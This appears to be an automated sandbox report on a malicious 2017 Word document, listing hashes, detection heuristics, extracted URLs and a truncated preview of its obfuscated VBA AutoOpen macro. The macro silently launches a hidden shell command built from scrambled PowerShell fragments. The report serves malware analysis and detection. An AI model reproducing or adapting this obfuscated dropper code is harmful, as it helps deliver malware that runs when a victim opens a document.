Office (OLE) malware analysis — malicious · 21f7f3749e8dd4ea

MALICIOUS

Office (OLE)

182.0 KB Created: 2017-12-14 17:02:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: 679d87d5d7ad52436d12a165a693dd99 SHA-1: 43b34cd3f3d7d3b5b77b1feca75f8295c797364e SHA-256: 21f7f3749e8dd4ea478a98b7380fc82884f294fd4a8ef707b0c98002ce4287b1

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute commands, a common technique for downloading and executing further malicious content. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' suggests a phishing or dropper functionality.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://yag4bP+4bP20X70ujz4quAFGl� In document text (OLE body)
- http://Xoj+Xojhillbod4bP+4bPyXoj+Xoj.comXoIn document text (OLE body)
- http://yag4bP+4bP20X70ujz4quAFGlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 78804 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	78804 bytes
SHA-256: `7e6f43805582de1be6b3117acb3727fc569e285e50a2466f29f2e04fe20cd9ce`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "ikYMYMbGLAzp" Sub AutoOpen() SzbjojIYvizlZN = "ajsWqEdIjCjcY" + "QWmzkdzXdQkNo" + "jQYwaSBBtdI" + "orriIHjkfINmo" + "sCDclcQBYTii" + "GlPdIqu" + "IfzIdiDwbClJq" + "wwRrjZmSXz" + "EdwQfFvtvkX" + "UHwMEzR" + "YLjmQLRKVBpHz" + "ZAEjwzqPvpbu" jhMiVGHBswLzTn = "YtvPDmizIXAT" + "JQrLWPh" + "ITTAshjEshc" + "FqBtMrKB" + "EKVnErbFAdEG" + "QacOKFBt" + "qXJzTPwwi" + "jrDIwNn" + "EzrEYDwZbRwjF" + "rpUzdHYMHCwzZQ" + "RdAXPzuXl" + "GAtojAwwhANoBk" RrrpFYdfMJn = "JpCzSizWGfYaBA" + "sQzccPr" + "FChfacVjisCoIi" + "vFDNZlT" + "nFXlPNjLh" + "rwvkCXulw" + "hzLsNNDWYCSMlk" + "aCrFTzhVWRiHLD" + "TnnZjotfXBJ" + "mfzfKKqc" + "CjfvAdoafG" + "TsifZMBFjXUEJ" upXmXwUbLRHHd = "KFEsuRqtzUGw" + "kvwibWHG" + "RoHKXshRXRiSv" + "ScKswAsCjZm" + "fOiflWcWnQkk" + "zMfwoQrpUiGRd" + "FvPIiXnM" + "isjLpYnCr" + "wAnNFrIvuLk" + "OHMWaYHCMGl" + "wEHEBQhbOriJSi" + "QZbsBhGd" VBA.Shell$ rTVzdkwwIpTEWE, 0 zSwOupNsPt = "AjEtddINX" + "DErPrckNjMp" + "iFiSThYdmuY" + "IjUhOYYsF" + "vOGzDMcifjaZBz" + "LKbouqJf" + "GKICzLnzVl" + "UMUdMAHO" + "rifVWDNwELGmi" + "stEZfUsdEPpq" + "qwctiunhYimjww" + "sJfXmfbkHbcuz" dQffEXwbS = "suzUORtjWB" + "vkSETONUSGzo" + "uOGAsbsRq" + "irfHWpht" + "zdhjNbkIkG" + "SsGjZzL" + "qvITFdnNnHrfk" + "aqpMitYHS" + "KpomkzhW" + "oCdpKcCZOwB" + "bQFRQqNRRUjcA" + "PoBcoZUA" KzBikfTKLRPiZj = "UIUFMUSBoB" + "OYmHbYbTu" + "PLclwJXKlZ" + "FhHfEPocsvMdW" + "uYDqrHGpz" + "wrTNKvq" + "bXJricW" + "nrCYCiGU" + "lUUuSjP" + "CiMvaRwFJBzI" + "taTiUOn" + "DOlwJYaWIJo" End Sub Function rTVzdkwwIpTEWE() mQWBClwtSVs = IsNull("WRkzUzoVCkIf") + IsNull("VFtwiFkEk") + IsNull("OuUwaRwZO") + IsNull("ZnTbaiRt") + IsNull("RwEQmTccf") + IsNull("mRdmEVDzz") + IsNull("DGLtVoimS") IpkRfRPT = IsNull("OctUiilzXMn") + IsNull("itwqbpU") + IsNull("YbBYNVXbOL") + IsNull("olwIiGPsUfqFW") + IsNull("VSpEzbqUnIn") + IsNull("VGNHKkLXwPh") + IsNull("UjMwzphVivsC") QccLF = Mid("Xc4Nw5lar]77+[cHar]69+[cHar]90),[cH4bP+4bPar]36 -replacE ([cHar]49+[cHar]109+[cHar]76),[cHar]92 -repl4bP+4bPacE ([cHar]104bP+4bP1+[cHar]113+[cHar]14bP+4bP15),[cHar]39) 4bP+4bcRE2XKbK2ij", 8, 168) ilCNIqroWlL = IsNull("znroSOKdif") + IsNull("pRIcsvBPGXiSfM") + IsNull("nLvzlpKG") + IsNull("wapUpLZRT") + IsNull("OpCRdsjXM") + IsNull("UVMcGaz") + IsNull("ktIfKrdRGjZv") jNNVvaiOK = IsNull("daGbClRCZQmH") + IsNull("jnhzbzoQsOzJK") + IsNull("VADEtlLpjdid") + IsNull("qLRJTzcYjzDOJ") + IsNull("SlLHSrAwCWM") + IsNull("VjqDETzKwEaEf") + IsNull("iMoAzpkI") vQkiWUnbVq = IsNull("NwPzWltSFESwFz") + IsNull("ONNPLrhaHji") + IsNull("nLlzzREH") + IsNull("wikoFQipph") + IsNull("uADtTKj") + IsNull("jYHOraG") + IsNull("UEUhBpHR") BTAVpBw = Mid("w 4bPQ0V4bP,[chaR'+'baRRjGjjaBLj2G95Wiw", 2, 20) CifMASPKUXa = IsNull("EYVMlmtJvzadw") + IsNull("dukRziNKHcIJ") + IsNull("IBWWINmlfiGLX") + IsNull("uiHEfmf") + IsNull("GPYliftQ") + IsNull("DcwlIYaRQJvzLd") + IsNull("bZSjzXc") OQuMij = IsNull("LwHwhnwkNL") + IsNull("EMzwfDIZl") + IsNull("wtRaGmN") + IsNull("fStFcIiGjLqwi") + IsNull("RVbMqHMiS") + IsNull("sVNDqXbB") + IsNull("shtVwkpOZWwi") VfINHjJEM = IsNull("JzvGwXiGsO") + IsNull("CjZTmFhmPdjNu") + IsNull("TJENNRVaFpnN") + IsNull("cthCDjWaW") + IsNull("GfaSlNt") + IsNull("jAUfOitizT") + IsNull("dkfZnEshafi") siRGZLmoXtB = Mid("PcXGcSJjM3BnLSm0oj+Xoj;MEZkXoj+XojarXoj+Xojapas = MEZnsaXoj+XojdasXoj+X'+'ojd.Xoj+Xojnex4bP+4bPtXoj+Xoj(Xoj'+'+Xoj1, Xoj+Xoj3Xoj+Xoj43245);MEZhuXo'+'j+XojasXoj+Xoj = MEZenv:publARX9TrB7", 17, 161) TbkjadX = IsNull("UjbwztwFfBAn") + IsNull("GvfPJkpOq") + IsNull("YzdcBtnIVYFA") + IsNull("buYhFiMjshl") + IsNull("tiJNLsYiDDw") + IsNull("RvMstiPHGR") + IsNull("VkDkjdA") sVNOdQw = IsNull("qqEfQsJVZj") + IsNull("LhNUdDKpEz") + IsNull("XZPJntf") + IsNull("XfqUfhwoHF") + IsNull("vfIZXWZQ") + IsNull("NjjcXmSfPG") + IsNull("PqCIoUM") qvHGzOd = IsNull("RrwHKduJfhW") + IsNull("YzCQJSUnNSi") + IsNull("cfocIHoACX" ... (truncated)

SHA-256: 7e6f43805582de1be6b3117acb3727fc569e285e50a2466f29f2e04fe20cd9ce

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ikYMYMbGLAzp"
Sub AutoOpen()
SzbjojIYvizlZN = "ajsWqEdIjCjcY" + "QWmzkdzXdQkNo" + "jQYwaSBBtdI" + "orriIHjkfINmo" + "sCDclcQBYTii" + "GlPdIqu" + "IfzIdiDwbClJq" + "wwRrjZmSXz" + "EdwQfFvtvkX" + "UHwMEzR" + "YLjmQLRKVBpHz" + "ZAEjwzqPvpbu"
jhMiVGHBswLzTn = "YtvPDmizIXAT" + "JQrLWPh" + "ITTAshjEshc" + "FqBtMrKB" + "EKVnErbFAdEG" + "QacOKFBt" + "qXJzTPwwi" + "jrDIwNn" + "EzrEYDwZbRwjF" + "rpUzdHYMHCwzZQ" + "RdAXPzuXl" + "GAtojAwwhANoBk"
RrrpFYdfMJn = "JpCzSizWGfYaBA" + "sQzccPr" + "FChfacVjisCoIi" + "vFDNZlT" + "nFXlPNjLh" + "rwvkCXulw" + "hzLsNNDWYCSMlk" + "aCrFTzhVWRiHLD" + "TnnZjotfXBJ" + "mfzfKKqc" + "CjfvAdoafG" + "TsifZMBFjXUEJ"
upXmXwUbLRHHd = "KFEsuRqtzUGw" + "kvwibWHG" + "RoHKXshRXRiSv" + "ScKswAsCjZm" + "fOiflWcWnQkk" + "zMfwoQrpUiGRd" + "FvPIiXnM" + "isjLpYnCr" + "wAnNFrIvuLk" + "OHMWaYHCMGl" + "wEHEBQhbOriJSi" + "QZbsBhGd"
VBA.Shell$ rTVzdkwwIpTEWE, 0
zSwOupNsPt = "AjEtddINX" + "DErPrckNjMp" + "iFiSThYdmuY" + "IjUhOYYsF" + "vOGzDMcifjaZBz" + "LKbouqJf" + "GKICzLnzVl" + "UMUdMAHO" + "rifVWDNwELGmi" + "stEZfUsdEPpq" + "qwctiunhYimjww" + "sJfXmfbkHbcuz"
dQffEXwbS = "suzUORtjWB" + "vkSETONUSGzo" + "uOGAsbsRq" + "irfHWpht" + "zdhjNbkIkG" + "SsGjZzL" + "qvITFdnNnHrfk" + "aqpMitYHS" + "KpomkzhW" + "oCdpKcCZOwB" + "bQFRQqNRRUjcA" + "PoBcoZUA"
KzBikfTKLRPiZj = "UIUFMUSBoB" + "OYmHbYbTu" + "PLclwJXKlZ" + "FhHfEPocsvMdW" + "uYDqrHGpz" + "wrTNKvq" + "bXJricW" + "nrCYCiGU" + "lUUuSjP" + "CiMvaRwFJBzI" + "taTiUOn" + "DOlwJYaWIJo"
End Sub
Function rTVzdkwwIpTEWE()
mQWBClwtSVs = IsNull("WRkzUzoVCkIf") + IsNull("VFtwiFkEk") + IsNull("OuUwaRwZO") + IsNull("ZnTbaiRt") + IsNull("RwEQmTccf") + IsNull("mRdmEVDzz") + IsNull("DGLtVoimS")
IpkRfRPT = IsNull("OctUiilzXMn") + IsNull("itwqbpU") + IsNull("YbBYNVXbOL") + IsNull("olwIiGPsUfqFW") + IsNull("VSpEzbqUnIn") + IsNull("VGNHKkLXwPh") + IsNull("UjMwzphVivsC")
QccLF = Mid("Xc4Nw5lar]77+[cHar]69+[cHar]90),[cH4bP+4bPar]36 -replacE ([cHar]49+[cHar]109+[cHar]76),[cHar]92  -repl4bP+4bPacE ([cHar]104bP+4bP1+[cHar]113+[cHar]14bP+4bP15),[cHar]39) 4bP+4bcRE2XKbK2ij", 8, 168)
ilCNIqroWlL = IsNull("znroSOKdif") + IsNull("pRIcsvBPGXiSfM") + IsNull("nLvzlpKG") + IsNull("wapUpLZRT") + IsNull("OpCRdsjXM") + IsNull("UVMcGaz") + IsNull("ktIfKrdRGjZv")
jNNVvaiOK = IsNull("daGbClRCZQmH") + IsNull("jnhzbzoQsOzJK") + IsNull("VADEtlLpjdid") + IsNull("qLRJTzcYjzDOJ") + IsNull("SlLHSrAwCWM") + IsNull("VjqDETzKwEaEf") + IsNull("iMoAzpkI")
vQkiWUnbVq = IsNull("NwPzWltSFESwFz") + IsNull("ONNPLrhaHji") + IsNull("nLlzzREH") + IsNull("wikoFQipph") + IsNull("uADtTKj") + IsNull("jYHOraG") + IsNull("UEUhBpHR")
BTAVpBw = Mid("w  4bPQ0V4bP,[chaR'+'baRRjGjjaBLj2G95Wiw", 2, 20)
CifMASPKUXa = IsNull("EYVMlmtJvzadw") + IsNull("dukRziNKHcIJ") + IsNull("IBWWINmlfiGLX") + IsNull("uiHEfmf") + IsNull("GPYliftQ") + IsNull("DcwlIYaRQJvzLd") + IsNull("bZSjzXc")
OQuMij = IsNull("LwHwhnwkNL") + IsNull("EMzwfDIZl") + IsNull("wtRaGmN") + IsNull("fStFcIiGjLqwi") + IsNull("RVbMqHMiS") + IsNull("sVNDqXbB") + IsNull("shtVwkpOZWwi")
VfINHjJEM = IsNull("JzvGwXiGsO") + IsNull("CjZTmFhmPdjNu") + IsNull("TJENNRVaFpnN") + IsNull("cthCDjWaW") + IsNull("GfaSlNt") + IsNull("jAUfOitizT") + IsNull("dkfZnEshafi")
siRGZLmoXtB = Mid("PcXGcSJjM3BnLSm0oj+Xoj;MEZkXoj+XojarXoj+Xojapas = MEZnsaXoj+XojdasXoj+X'+'ojd.Xoj+Xojnex4bP+4bPtXoj+Xoj(Xoj'+'+Xoj1, Xoj+Xoj3Xoj+Xoj43245);MEZhuXo'+'j+XojasXoj+Xoj = MEZenv:publARX9TrB7", 17, 161)
TbkjadX = IsNull("UjbwztwFfBAn") + IsNull("GvfPJkpOq") + IsNull("YzdcBtnIVYFA") + IsNull("buYhFiMjshl") + IsNull("tiJNLsYiDDw") + IsNull("RvMstiPHGR") + IsNull("VkDkjdA")
sVNOdQw = IsNull("qqEfQsJVZj") + IsNull("LhNUdDKpEz") + IsNull("XZPJntf") + IsNull("XfqUfhwoHF") + IsNull("vfIZXWZQ") + IsNull("NjjcXmSfPG") + IsNull("PqCIoUM")
qvHGzOd = IsNull("RrwHKduJfhW") + IsNull("YzCQJSUnNSi") + IsNull("cfocIHoACX"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.